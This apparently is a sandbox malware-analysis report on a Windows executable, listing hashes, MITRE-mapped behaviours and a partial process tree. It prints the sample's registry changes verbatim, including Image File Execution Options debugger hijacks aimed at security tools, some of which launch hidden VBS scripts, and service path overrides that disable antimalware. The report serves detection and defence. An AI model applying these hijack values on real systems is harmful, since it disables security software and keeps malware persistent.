05f77e6ec37b63156c00611265bceefd5479ecc3dff18496ea6a6e4de0e859bf

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 06:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe
Size

491KB
MD5

eabe36d7d77407d5b7b0d7059d794e39
SHA1

f8e4e0edb658380a813df054f477ab3d5af8ad4b
SHA256

05f77e6ec37b63156c00611265bceefd5479ecc3dff18496ea6a6e4de0e859bf
SHA512

fa615b05e895032b4c4d66f5458b76ac7f9bccbfab808b6e0c2df77fb5b58405a3c20bfce0571332e9ee72591cbeae295c0884f59e12941a77309bb4c4f737df
SSDEEP

12288:cutrzh9xOXkUWzsKltSXkbnDlcQmbVXvUF5:cutr5OUUe3LSXSUvUP

Score

8^/10

discovery persistence

Malware Config

Signatures

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrWeb.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\XTray.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\surfblock.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRManager.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Win_Updater.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SFAUpdater.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rutserv.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SBAMTray.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrlC.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consctl.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\econser.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemDriveHost.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cain.exe\debugger = "cmd /c start /MIN wscript //nologo C:\\Windows\\netframework.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Dr.Web.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchots.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinApp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rvlkl.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetGoodBar.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webisida.browser.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anvirlauncher.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wahiver64.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wnhelp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N360.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswclear5.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WUDFHost.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrueImageMonitor.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MBAMService.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ErrorsChecking.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cureit.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvnc.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ONLINENT.EXE	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TMBMSRV.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dcsrv.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinApp.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer-aes-sse42.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\help.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\restarter_x64.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hscangui.exe\debugger = "cmd /c start /MIN wscript //nologo C:\\Windows\\runtime.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\massscan_launcher.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetFramework.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hkcmd.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consctlx.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinPatrol.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updateservice.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuard.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\indexer.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DriverBooster.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvpncsvc.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netupdsrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\emlproxy.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\expmon.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dll32.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\network-app.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WMIC.exe.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msapp.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JavaUpdater.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BusinessMessaging.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svcohst.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer-sse42.exe\debugger = "fixmapi.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssm-xsc.exe\debugger = "fixmapi.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetTraffic.exe	reg.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\EsgShKernel\ImagePath = "WinUpdate"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a2AntiMalware\ImagePath = "WinUpdate"	Process not Found

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe

Executes dropped EXE 64 IoCs

pid	Process
4952	wget.exe
2728	wget.exe
3376	wget.exe
4092	subinacl.exe
5080	subinacl.exe
4640	subinacl.exe
1508	subinacl.exe
4448	subinacl.exe
2104	subinacl.exe
1604	subinacl.exe
4812	subinacl.exe
2436	subinacl.exe
4816	subinacl.exe
2036	subinacl.exe
3688	subinacl.exe
2652	subinacl.exe
1868	subinacl.exe
4232	subinacl.exe
5040	subinacl.exe
3560	subinacl.exe
2284	subinacl.exe
3792	subinacl.exe
3308	subinacl.exe
4616	subinacl.exe
3648	subinacl.exe
2096	subinacl.exe
3940	subinacl.exe
2892	subinacl.exe
392	subinacl.exe
4800	subinacl.exe
4400	subinacl.exe
648	subinacl.exe
2596	subinacl.exe
3220	subinacl.exe
4884	subinacl.exe
4348	subinacl.exe
3540	subinacl.exe
4496	subinacl.exe
1988	subinacl.exe
612	subinacl.exe
3796	subinacl.exe
3092	subinacl.exe
1104	subinacl.exe
1708	subinacl.exe
3856	subinacl.exe
3408	subinacl.exe
3488	subinacl.exe
2344	subinacl.exe
1672	subinacl.exe
804	subinacl.exe
4320	subinacl.exe
3348	subinacl.exe
1600	subinacl.exe
4532	subinacl.exe
2204	subinacl.exe
1964	subinacl.exe
2168	subinacl.exe
3100	subinacl.exe
1888	subinacl.exe
5016	subinacl.exe
1004	subinacl.exe
4396	subinacl.exe
2080	subinacl.exe
2316	subinacl.exe

Checks for any installed AV software in registry 1 TTPs 7 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Set key security	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a2AntiMalware	Process not Found
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a2AntiMalware\ImagePath	Process not Found
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a2AntiMalware	Process not Found
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a2AntiMalware\ImagePath = "WinUpdate"	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	Process not Found
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a2AntiMalware	Process not Found

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2256	tasklist.exe
3452	tasklist.exe
4044	tasklist.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\netframework.vbs	cmd.exe
File created	C:\Windows\framework.vbs	cmd.exe
File created	C:\Windows\runtime.vbs	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	subinacl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
456	PING.EXE
2656	PING.EXE

System Time Discovery 1 TTPs 2 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
2140	reg.exe
1384	Process not Found

Kills process with taskkill 1 IoCs

evasion

pid	Process
4592	taskkill.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
456	PING.EXE
2656	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	220	eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe
Token: SeRestorePrivilege	220	eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe
Token: SeDebugPrivilege	2256	tasklist.exe
Token: SeDebugPrivilege	3452	tasklist.exe
Token: SeDebugPrivilege	4044	tasklist.exe
Token: SeDebugPrivilege	4592	taskkill.exe
Token: SeSecurityPrivilege	4092	subinacl.exe
Token: SeBackupPrivilege	4092	subinacl.exe
Token: SeRestorePrivilege	4092	subinacl.exe
Token: SeRestorePrivilege	4092	subinacl.exe
Token: SeTakeOwnershipPrivilege	4092	subinacl.exe
Token: SeChangeNotifyPrivilege	4092	subinacl.exe
Token: SeDebugPrivilege	4092	subinacl.exe
Token: SeSecurityPrivilege	5080	subinacl.exe
Token: SeBackupPrivilege	5080	subinacl.exe
Token: SeRestorePrivilege	5080	subinacl.exe
Token: SeRestorePrivilege	5080	subinacl.exe
Token: SeTakeOwnershipPrivilege	5080	subinacl.exe
Token: SeChangeNotifyPrivilege	5080	subinacl.exe
Token: SeDebugPrivilege	5080	subinacl.exe
Token: SeSecurityPrivilege	4640	subinacl.exe
Token: SeBackupPrivilege	4640	subinacl.exe
Token: SeRestorePrivilege	4640	subinacl.exe
Token: SeRestorePrivilege	4640	subinacl.exe
Token: SeTakeOwnershipPrivilege	4640	subinacl.exe
Token: SeChangeNotifyPrivilege	4640	subinacl.exe
Token: SeDebugPrivilege	4640	subinacl.exe
Token: SeSecurityPrivilege	1508	subinacl.exe
Token: SeBackupPrivilege	1508	subinacl.exe
Token: SeRestorePrivilege	1508	subinacl.exe
Token: SeRestorePrivilege	1508	subinacl.exe
Token: SeTakeOwnershipPrivilege	1508	subinacl.exe
Token: SeChangeNotifyPrivilege	1508	subinacl.exe
Token: SeDebugPrivilege	1508	subinacl.exe
Token: SeSecurityPrivilege	4448	subinacl.exe
Token: SeBackupPrivilege	4448	subinacl.exe
Token: SeRestorePrivilege	4448	subinacl.exe
Token: SeRestorePrivilege	4448	subinacl.exe
Token: SeTakeOwnershipPrivilege	4448	subinacl.exe
Token: SeChangeNotifyPrivilege	4448	subinacl.exe
Token: SeDebugPrivilege	4448	subinacl.exe
Token: SeSecurityPrivilege	2104	subinacl.exe
Token: SeBackupPrivilege	2104	subinacl.exe
Token: SeRestorePrivilege	2104	subinacl.exe
Token: SeRestorePrivilege	2104	subinacl.exe
Token: SeTakeOwnershipPrivilege	2104	subinacl.exe
Token: SeChangeNotifyPrivilege	2104	subinacl.exe
Token: SeDebugPrivilege	2104	subinacl.exe
Token: SeSecurityPrivilege	1604	subinacl.exe
Token: SeBackupPrivilege	1604	subinacl.exe
Token: SeRestorePrivilege	1604	subinacl.exe
Token: SeRestorePrivilege	1604	subinacl.exe
Token: SeTakeOwnershipPrivilege	1604	subinacl.exe
Token: SeChangeNotifyPrivilege	1604	subinacl.exe
Token: SeDebugPrivilege	1604	subinacl.exe
Token: SeSecurityPrivilege	4812	subinacl.exe
Token: SeBackupPrivilege	4812	subinacl.exe
Token: SeRestorePrivilege	4812	subinacl.exe
Token: SeRestorePrivilege	4812	subinacl.exe
Token: SeTakeOwnershipPrivilege	4812	subinacl.exe
Token: SeChangeNotifyPrivilege	4812	subinacl.exe
Token: SeDebugPrivilege	4812	subinacl.exe
Token: SeSecurityPrivilege	2436	subinacl.exe
Token: SeBackupPrivilege	2436	subinacl.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 3176	220	eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe	82
PID 220 wrote to memory of 3176	220	eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe	82
PID 220 wrote to memory of 3176	220	eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe	82
PID 3176 wrote to memory of 2268	3176	cmd.exe	84
PID 3176 wrote to memory of 2268	3176	cmd.exe	84
PID 3176 wrote to memory of 2268	3176	cmd.exe	84
PID 3176 wrote to memory of 3364	3176	cmd.exe	85
PID 3176 wrote to memory of 3364	3176	cmd.exe	85
PID 3176 wrote to memory of 3364	3176	cmd.exe	85
PID 3176 wrote to memory of 4544	3176	cmd.exe	86
PID 3176 wrote to memory of 4544	3176	cmd.exe	86
PID 3176 wrote to memory of 4544	3176	cmd.exe	86
PID 3176 wrote to memory of 4488	3176	cmd.exe	87
PID 3176 wrote to memory of 4488	3176	cmd.exe	87
PID 3176 wrote to memory of 4488	3176	cmd.exe	87
PID 3176 wrote to memory of 2896	3176	cmd.exe	88
PID 3176 wrote to memory of 2896	3176	cmd.exe	88
PID 3176 wrote to memory of 2896	3176	cmd.exe	88
PID 3176 wrote to memory of 4804	3176	cmd.exe	89
PID 3176 wrote to memory of 4804	3176	cmd.exe	89
PID 3176 wrote to memory of 4804	3176	cmd.exe	89
PID 3176 wrote to memory of 3148	3176	cmd.exe	90
PID 3176 wrote to memory of 3148	3176	cmd.exe	90
PID 3176 wrote to memory of 3148	3176	cmd.exe	90
PID 3176 wrote to memory of 5108	3176	cmd.exe	91
PID 3176 wrote to memory of 5108	3176	cmd.exe	91
PID 3176 wrote to memory of 5108	3176	cmd.exe	91
PID 3176 wrote to memory of 1644	3176	cmd.exe	92
PID 3176 wrote to memory of 1644	3176	cmd.exe	92
PID 3176 wrote to memory of 1644	3176	cmd.exe	92
PID 3176 wrote to memory of 940	3176	cmd.exe	93
PID 3176 wrote to memory of 940	3176	cmd.exe	93
PID 3176 wrote to memory of 940	3176	cmd.exe	93
PID 3176 wrote to memory of 1720	3176	cmd.exe	94
PID 3176 wrote to memory of 1720	3176	cmd.exe	94
PID 3176 wrote to memory of 1720	3176	cmd.exe	94
PID 3176 wrote to memory of 2360	3176	cmd.exe	95
PID 3176 wrote to memory of 2360	3176	cmd.exe	95
PID 3176 wrote to memory of 2360	3176	cmd.exe	95
PID 3176 wrote to memory of 4744	3176	cmd.exe	96
PID 3176 wrote to memory of 4744	3176	cmd.exe	96
PID 3176 wrote to memory of 4744	3176	cmd.exe	96
PID 3176 wrote to memory of 3596	3176	cmd.exe	97
PID 3176 wrote to memory of 3596	3176	cmd.exe	97
PID 3176 wrote to memory of 3596	3176	cmd.exe	97
PID 3176 wrote to memory of 2960	3176	cmd.exe	98
PID 3176 wrote to memory of 2960	3176	cmd.exe	98
PID 3176 wrote to memory of 2960	3176	cmd.exe	98
PID 3176 wrote to memory of 3448	3176	cmd.exe	99
PID 3176 wrote to memory of 3448	3176	cmd.exe	99
PID 3176 wrote to memory of 3448	3176	cmd.exe	99
PID 3176 wrote to memory of 1052	3176	cmd.exe	100
PID 3176 wrote to memory of 1052	3176	cmd.exe	100
PID 3176 wrote to memory of 1052	3176	cmd.exe	100
PID 3176 wrote to memory of 636	3176	cmd.exe	101
PID 3176 wrote to memory of 636	3176	cmd.exe	101
PID 3176 wrote to memory of 636	3176	cmd.exe	101
PID 3176 wrote to memory of 1412	3176	cmd.exe	102
PID 3176 wrote to memory of 1412	3176	cmd.exe	102
PID 3176 wrote to memory of 1412	3176	cmd.exe	102
PID 3176 wrote to memory of 2108	3176	cmd.exe	103
PID 3176 wrote to memory of 2108	3176	cmd.exe	103
PID 3176 wrote to memory of 2108	3176	cmd.exe	103
PID 3176 wrote to memory of 1108	3176	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eabe36d7d77407d5b7b0d7059d794e39_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rer.bat" "
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
